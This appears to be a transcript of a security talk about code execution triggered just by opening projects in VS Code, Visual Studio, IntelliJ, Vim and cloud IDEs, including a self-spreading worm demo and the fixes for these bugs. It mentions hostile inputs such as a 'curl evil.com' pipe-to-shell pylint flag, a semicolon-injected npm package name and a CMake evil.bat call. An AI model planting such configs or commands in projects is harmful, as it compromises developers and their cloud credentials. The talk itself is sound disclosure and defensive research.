 Hi everyone, I'm David, and today we're going to talk about hacking IDEs. First, a little bit about myself. I'm a security engineer at Google where I work on web security. I'm focused both on developing new web security features, along with figuring out how to deploy them at a scale. Outside of work, I really enjoy hacking in both senses of the word. So I enjoy programming, working on silly programming projects, just for the joy of creating something. As much as I enjoy finding vulnerabilities, taking things apart, and working on bug bounties. So during the pandemic, I had a couple of months free when I was originally supposed to be taking time off to go traveling. And I spent a few months looking into IDE security. And I found and reported 30 or 40 different bugs in a bunch of different IDEs. So today, I want to go through a whirlwind tour of a bunch of these bugs. And one thing to note here, all of the bugs in this presentation have either been fixed or declared working as intended. So why hack developers? If you go after your standard production infrastructure, that's likely to be heavily hardened. Everyone thinks about attacking production. And because of that, that's where defenders put a lot of time and effort into. Developers, on the other hand, are a less common target. So chances are they are not as hardened as production. But because they're the creators of production, they maintain it and push new code to it, oftentimes developers have the ability to access production. So if you can hack them, you can then use their credentials to pivot into production. IDEs specifically are a really interesting target, in my opinion, because they've been getting more and more complex over time. And IDE is no longer just a text editor. Now it includes so many different fancy tools to provide autocomplete, to use AI autocomplete, to integrate with any tool you can imagine. And whenever you have all those integrations, you're more likely to have bugs. If you ask your average developer, or even your average security person, where the security boundary is when they open up something that they don't trust, they're likely to point to the Run button. So in this case, I personally would have thought if I don't hit Run, it would be totally safe to open up this random folder and look at some of the code inside of it. But it turns out most IDEs, at least used to see the security boundary, is just opening something to view it. And what makes all of this especially impactful is the fact that IDEs are extremely popular. Over half of all developers use VS code, one popular IDE that's made using a kind of web stack. It's built in HTML and JavaScript. So if you have a bug just in VS code, you already have the ability to target half of all developers. And then there are a couple others that once you find a way to attack those, number of developers you can attack just continues to go up. When the pandemic hit, I ended up with a lot of free time because I had plans to go traveling and that wasn't happening. So I started to look into VS code just because it's one that I personally use a lot. One really common vulnerability pattern in VS code stems from workspace settings. So VS code allows two different ways to configure settings. You have your standard user settings, which apply to everything on your computer. But there are also workspace settings and workspace settings are specific to a directory that you open. And the really interesting thing about workspace settings is the settings file is actually stored inside of this magic.vscode slash settings.json file inside of the project. So if you download some Git repo off the internet and open it up in VS code, it can supply its own workspace settings. So this is a really useful feature because it allows projects to configure themselves in a way that makes them easy to work with. Where this goes wrong is that VS code and a lot of VS code extensions have settings that are actually not safe to be configured by an untrusted party. So this isn't just changing the font size or changing benign settings. There are settings that actually can turn into code execution. So for example, the Python VS code extension made it possible to override the path to the Flake 8 binary. Flake 8 is a common Python linker. So it's meant to give you areas of your lines are too long. But by overriding the Flake 8 path to a binary included inside of a project, it was possible to convince the Python VS code extension to start executing code included in the project as soon as you view a file because the linker runs as soon as you view a file. So this is scary because it means viewing a file just to try to understand what a project is. For example, opening up a POC you downloaded off the internet. Isn't actually safe in the face of this. One really useful tool I used throughout all of this research was Strace. Strace is this amazing tool that allows you to run a command and log all of the syscalls that it makes. Syscalls are how commands or programs interact with the operating system and thus interact with any other resource on the computer. So every time they want to start a new process, open a thread, open a file, anything like that, that has to go through a syscall. So for example, if we wanted to run VS code via Strace, we would just run this and then we'd be able to look at all of the syscalls that it makes. What's so powerful about this is it allows you to understand the actual behavior of a program without having to read all of the source code. Ideas are huge and it just isn't practical to read every line of the source, but it is practical to review the syscalls and use that to understand how it works. So for example, you can cat this file and grep for enoant. Enoant is the return code that you get if you try to open a file that doesn't exist. So this allows you to know that VS code tried to open a file but it didn't exist and thus there might be some kind of special behavior for this. For example, it might be opening a config file and you might be able to poison that config file. You can also just grep for the open syscall. So this would find every file that it opens whether it exists or not. Another really useful one is grepping for the exec syscall. So this is how you launch another process running another command. So this makes it possible to look for kind of your standard command injection style attacks. One bug I found with this was a common one in a lot of JavaScript based extensions where most VS code extensions are developed in JavaScript. And the default behavior is that it will attempt to load the node modules folder in order to find the dependencies of that extension. But where this goes wrong is it will first attempt to load the node modules folder from the currently open project. So in this case, this was the JS hint extension which is another link there. So it runs as soon as you open a file and we see that it attempted to open the node modules slash the JS hint file within the currently open directory. So what this means is we could just put our own code in there some malicious JavaScript and it will helpfully just go and execute that as soon as you open a file when it tries to provide enter support. Another one also found VS trace was a command injection bug where npm is a common JavaScript package manager. And in package.json files which is how npm is configured VS code attempts to be helpful and wants to provide you information on the dependencies you have installed. So it goes and takes every dependency you have installed and passes it into npm view. The key thing to note here is that it does not escape the package name. So if you just have a package named semi colon space and then any command it will just start executing that. And this was just found via running it with S trace and looking for any time it runs exec. Moving on from visual studio code to visual studio which is a different IDE also made by Microsoft. One bug I found in this was with build configs. So visual studio supports CMake. CMake is kind of like make if you've ever used that. And it will by default run CMake in order to provide autocomplete for anything you open. Where this goes wrong is that CMake provides the ability to execute a command. So in this case, you can just execute process of evil.bat and that will run as soon as anything is opened inside a visual studio. I reported this to Microsoft and in contrast to all of the VS code bugs which were all treated very seriously and promptly patched. Their decision for this was that this is by design and there is no way to view scripts in visual studio without also executing them. So this is a fair bit of warning that VS code at least attempts to be safe when opening untrusted projects but visual studio does not. Something really interesting happened a couple of months later. Google's threat analysis group published a blog post that I was not involved with about a North Korean threat actor that was targeting security researchers. And what they were doing was they were reaching out to security researchers and asking for help debugging their zero days. And if the researcher agreed they would send them a zip file containing a visual studio project to open up. And inside of this visual studio project it used a very similar trick in order to get command code execution as soon as it was opened and then use that to poem the developer. What this shows in my opinion is that this attack vector is not just a theoretical concern. This is something that actual APT is out in the real world are using and they're using it to attack security researchers who are already relatively paranoid. So if you ever are given a zip file and told to open it by someone saying hey, I need some help, definitely be suspicious about that. One historical bug that I just wanna cover that I think is so fascinating is a bug in IntelliJ from 2016 where this person found that IntelliJ had a locally listening web server and that any website you open could talk to that web server via cores and ask it to open a project. And IntelliJ would then open this project, even a project downloaded off of the internet and then would execute a startup task contained within that project. So for example, this was their POC where visiting local host was able to pop calculator with zero interaction. What's interesting about this is that when IntelliJ fix this, they fix this by preventing local host or any untrusted website from interacting with IntelliJ. They didn't fix this by blocking the opening a project being equivalent to code execution vector. So I reached back out to them to discuss this using pretty much exactly the same vector where you have a startup task and it can just execute any command. And this is a built-in feature of IntelliJ. And their initial reply was that they haven't decided what the fix should be because they need to make a trade-off between security and convenience. And this was a really common pattern when talking to IDE developers because IDE has tried to make developers' lives easier. They want to make it as efficient to make software as possible. And if you have to constantly warn someone about this risk, this risk, this risk, that's gonna annoy developers. Ultimately, IntelliJ did decide to fix this. And their fix is that whenever you open a project for the first time, if it contains a startup task, it warns you. And if you think that these bugs only apply to large, heavy-weight ID is like IntelliJ, you're sadly mistaken. So this was a fascinating bug from 2019 where Vim has a concept of mode lines, which are kind of analogous to VS Code and its workspace settings. And via mode lines, it turns out it was possible to get code execution just from opening a file. Again, with zero user interaction other than viewing a file. Tavis even found a great bug in Notepad where it was possible to take opening a file in Notepad, kind of the dumbest and most basic of editors and turn that into code execution. Where this gets even more interesting, in my opinion, is online IDEs. There's a big shift nowadays where companies are trying to have developers use online IDEs that run in the cloud. The idea behind this is that rather than running everything locally with limited resources on a laptop and having to worry about internet speed, processor speed and provisioning enough resources, developers can essentially be given a virtual machine in the cloud that their IDE runs inside of. So Google Cloud Shell, Azure, AWS, GitHub, all of these companies have their own solution for this. What makes these really interesting, in my opinion, is that they all include built-in cloud credentials, Google Cloud, Cloud9, Azure. And what this means is if you manage to get code execution inside of one of these VMs, it is already authenticated to access anything in the cloud that that developer has access to. So that makes these a really impactful target from a security perspective. I found a really fun bug inside of Google Cloud Shell. So Google Cloud Shell is built on top of Eclipse Thea. Eclipse Thea is an open source web IDE. And Eclipse Thea has support for Ruby via the Thea Ruby extension. And the Thea Ruby extension is then built on top of SolarGraph, which is an open source project maintained by a single person. So what's kind of interesting about this is that Google Cloud Shell, which has very strict security requirements, three levels down is depending on an open source thing that they really don't have very much influence over. So when I started reading the SolarGraph code, I found this hack, evaluating gem spec files violates the goal of not running workspace code, but this is how gemspecification.load does it anyway. And then you see it reads a file and evaluates it. So what this means is if someone opens something inside of their online Cloud Shell IDE, and it contains a gem spec file, it immediately evaluates that Ruby code. And that Ruby code can then start stealing the cloud credentials and acting as that user. There was a similar bug in the TypeScript language server also, where TypeScript made it possible to specify additional compiler plugins that provide support for different language features. And this in theory should be safe because all of these plugins are loaded from slash var slash and somewhere in there. But the classic dot dot slash trick actually just worked totally fine here. What both of these vulnerabilities have in common is that they both stem from a very, very sensitive application, in this case, Google Cloud Shell, using dependencies that have a very different threat model. So Google Cloud Shell, it's important that opening something does not turn into code execution. But for these other dependencies oftentimes made by a single person somewhere, this is actually an important barrier. AWS Cloud 9 also had a very similar bug where it, similar to VS Code, allows a project to include its own settings. And one of the settings that it allows a project to configure is a bunch of pylint flags. Pylint is another length there. This is a very common vector because linters always execute as soon as you view a file. And inside of these included workspace settings, you could provide pylint flags. And the interesting thing is that pylint supports a kind of bizarre feature where you could pass it an arbitrary expression to evaluate, and it will use that expression to score how well your code adheres to a coding style. So in this case, you can just pass a curl evil.com pipe shsh and that worked just fine. GitHub Codespaces is another one of these online IDs. From a security perspective, GitHub Codespaces has a really clever design, in my opinion, rather than trying to prevent code execution from happening, it runs every project in an isolated VM. And the idea is that one VM containing one code space for one repository can't interact or interfere with any other VM. Where this goes wrong is that GitHub Codespaces had a concept of setting sync. And setting sync made it possible to configure settings for one code space and have these get sent to every other code space. So this was a feature meant to be used for things like changing font size. But where this went wrong is if you opened an untrusted repository in GitHub Codespaces, that untrusted repository could easily get code execution inside of that isolated VM, and then it could configure settings for that entire code space, and those settings would then be synced everywhere else. And it turns out it was really easy to go and use those settings in order to sync command execution across VMs. The part that is absolutely terrifying to me about all of this is what happens if someone writes a worm. So the idea is you start with one developer, one person who has somehow been compromised, and they can push a bunch of malicious IDE configs to one repository, and you push vulnerability as an exploit for all of the ones we've talked about and more. And then people are gonna start viewing that, and they're gonna start looking at that one repository. And assuming they're using any common IDE, which as we established before, they probably are, then that worm can automatically propagate itself to every repository that they have control over. And then people are likely gonna view those repositories. And then this can keep on propagating exponentially and really has a lot of terrifying potential to spread really far. So I made a quick demo of this, so let's run through that. So here we have an empty repository. It has nothing in it other than a readme file. And then inside of Evil repo, we have a bunch of different IDE config files. So these will all execute worm.py whenever they're opened in the applicable IDE. So if you open this in VS code or IntelliJ or any popular IDE, it'll automatically execute the worm. And then that will look for any Git repositories on your computer and automatically backdoor them and then run Git push to push that up so as to continue spreading the worm. So we're gonna go ahead and get clone these. So we're just gonna clone it and then open it up in VS code. And then here in VS code, there's no hint of anything suspicious at all. Everything looks totally normal. No error messages, nothing of that sort. But if we go over here to what was an empty repository and wait a few seconds before we refresh, it has now been backdoored and contains all of these things and will continue spreading if anyone else opens it up. As I mentioned before, the core defense against this class of bugs is developers need to be prompted and need to be given a choice before code starts executing. VS code just came out with a new feature that helps defend against this class of bugs called workspace trust. And what this does is when you open something for the first time, you're asked whether or not you trust it and that defines whether it runs in trusted mode or restricted mode. And if it's in restricted mode, by default, it does not use any of the settings defined inside of that folder. And it also does not allow any extensions to run. So this makes it so it's a really minimal IDE when it's being used with untrusted code, but you still have the power of a full IDE if you trust a folder. So I just wanna say thank you to everyone I worked with on finding these bugs and getting them addressed. There are tons of different companies involved with fixing these. So thank you to everyone for that. I uploaded the POC from the demo to GitHub. You can also get these slides and a big shout out to a fantasy who originally kind of got me interested in this area of research when they published four different bugs in Google Cloud Shell. So I definitely recommend checking out that blog post. Thank you everyone. Bye.